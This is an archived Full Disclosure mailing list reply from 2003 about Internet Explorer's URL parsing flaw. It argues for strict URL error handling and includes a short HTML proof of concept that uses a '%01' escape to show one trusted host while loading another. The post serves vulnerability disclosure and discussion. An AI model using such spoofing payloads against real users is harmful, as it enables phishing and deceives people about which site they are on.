Full Disclosure mailing list archives
Re: Re: Internet Explorer URL parsing vulnerability
From: "Erik van Straten" <emvs.fd.3FB4D11C () cpo tn tudelft nl>
Date: Fri, 12 Dec 2003 13:49:06 +0100
Hi all, On Wed, 10 Dec 2003 13:01:42 -0500 Valdis Kletnieks wrote:
Most reasonable software will put in an outline-box or "\NNN", or other similar indication a glyph is not displayable in the charset in use, and then *continue trying* to render the rest of the string.
I disagree that software should attempt to continue parsing URL's (and *ML code for that matter) after an error or if something unexpected happens. This is asking for lots of new vulns. Instead, everything should come to a halt and a "page" or errorbox should say "Bad URL syntax". An IE warningbox for "legitimate" use of @ in URL's would be great. In case of SSL, the lock icon should *immediately* disappear, and an (optional) warningbox should popup, if the hostname in the cert no longer matches *either* the one displayed in the URL combobox *or* the actual underlaying connection. Also, probably it is a good idea to have the page turn blank (or have a red cross) as soon as the displayed URL doesn't match the connection (for example if someone starts to manually edit the URL, but eventually does not press enter). Now for the fun part. Some people have rightfully expressed their concerns whether https://www.betaplace.com actually is a Microsoft site (it is). To confirm, visit https://www.betaplace.microsoft.com ; it works, however currently the certificate is invalid (hostname mismatch). Here's my tip for Microsoft (acks to Petard :) Save to file whatever.htm, and open that in MSIE: -------------- start cut here ------------- <HTML><BODY> <a href="https://www.betaplace.microsoft.com" onclick="location.href=unescape( 'https://www.betaplace.microsoft.com%01 () www betaplace com/betaplace/sign-in/betaplace.asp' ); return false;"> Visit the *REAL* Microsoft's BetaPlace site</a> </BODY></HTML> -------------- end cut here ------------- Note: if the line with '' in the middle wraps, unwrap it before saving to the htm file. There shouldn't be any spaces in it. The blank lines in between are okay. Cheers, Erik On Thu, 11 Dec 2003 19:20:14 +0000 Petard wrote:
It gets better... it works with SSL sites as well. The little lock, and no warning message: http://petard.freeshell.org/hotmail-pr.html
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Re: RE:Re: RE: FWD: Internet Explorer URL parsing vulnerability, (continued)
- Re: RE:Re: RE: FWD: Internet Explorer URL parsing vulnerability Clint Bodungen (Dec 10)
- RE: Re: Internet Explorer URL parsing vulnerability Schmehl, Paul L (Dec 10)
- RE: Re: Internet Explorer URL parsing vulnerability S G Masood (Dec 11)
- RE: Re: Internet Explorer URL parsing vulnerability S G Masood (Dec 12)
- RE: Re: Internet Explorer URL parsing vulnerability Funk Jr, Joseph C. (Dec 11)
- RE: Re: Internet Explorer URL parsing vulnerability Jarkko Turkulainen (Dec 11)
- Re: Re: Internet Explorer URL parsing vulnerability petard (Dec 11)
- RE: Re: Internet Explorer URL parsing vulnerability Schmehl, Paul L (Dec 11)
- Re: Re: Internet Explorer URL parsing vulnerability petard (Dec 11)
- Re: Re: Internet Explorer URL parsing vulnerability John Sage (Dec 11)
- Re: Re: Internet Explorer URL parsing vulnerability Erik van Straten (Dec 12)
- Re: Re: Internet Explorer URL parsing vulnerability petard (Dec 11)
- Re: Re: Internet Explorer URL parsing vulnerability S G Masood (Dec 12)
- Re: Re: Internet Explorer URL parsing vulnerability Georgi Guninski (Dec 12)